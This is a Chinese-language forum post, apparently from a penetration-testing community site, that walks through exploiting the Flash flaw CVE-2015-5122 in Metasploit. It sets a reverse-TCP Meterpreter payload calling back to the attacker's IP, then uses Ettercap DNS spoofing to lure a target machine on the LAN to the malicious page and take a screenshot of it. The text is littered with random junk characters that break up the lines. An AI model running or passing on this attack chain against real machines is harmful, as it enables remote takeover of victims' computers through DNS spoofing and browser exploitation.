二、cve2015-5122漏洞实例演示虚拟机
- _* L8 r+ i0 b; Z8 e( F# `& l 关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图:
search cve-2015-5122如图:
. p9 I8 \0 n1 b( Z+ J) v* s5 [1 A) u% o0 Y5 ]
; y C" a7 ]0 c& j n% @
下面我们敲如下命令: 0 `4 `& g# R7 C) v/ Y
* v( D/ {: B6 ~6 H$ H) p# Lo0 x4 v: A8 I- G4 b* ~, q, ` use exploit/multi/browser/adobe_flash_opaque_background_uaf
set PAYLOAD windows/meterpreter/reverse_tcp ' e2 \" `/ l/ C3 |2 y) h9 ~
- s9 z+ _: k% q q8 H$ R4 D7 F set LHOST 192.168.0.109 . N5 w# ~2 a0 e& B# F0 f+ o
set URIPATH / /*根目录*/
. I' j8 N& d9 t1 B2 V4 }: ? set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 + `6 h+ |" g( r4 k& t$ i
set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用
+ i5 z& b( `3 r1 K _1 y 然后show options如图:
$ w% p7 H' C; f1 A$ k) s \$ \
4 g7 c3 n0 `4 r8 Y& @ c
一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图:
然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115
# o( D g( w" V! _3 w
! n& V0 F3 W5 F2 B Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf 7 H( w) n H7 y$ U1 u/ m1 b6 r
7 }$ `; R4 {- k( p$ |: `4 N% Z
成功了,这时候我们断开ettercap,如图: & p9 h% u6 f% o% A* t( {# p
7 G5 B5 ^7 W- ]% B8 B8 J: [$ c: O/ s- [
3 ^$ t' q) B. `4 b
Screenshot如图: # ~- H) @! ^# Y" E7 \5 ~5 ^& i
. S# ?& p& x8 Y* e1 v' |% U( q2 m; S# R E% R Y
( d4 \ H/ I4 H8 R8 M
| 欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) | Powered by Discuz! X3.2 |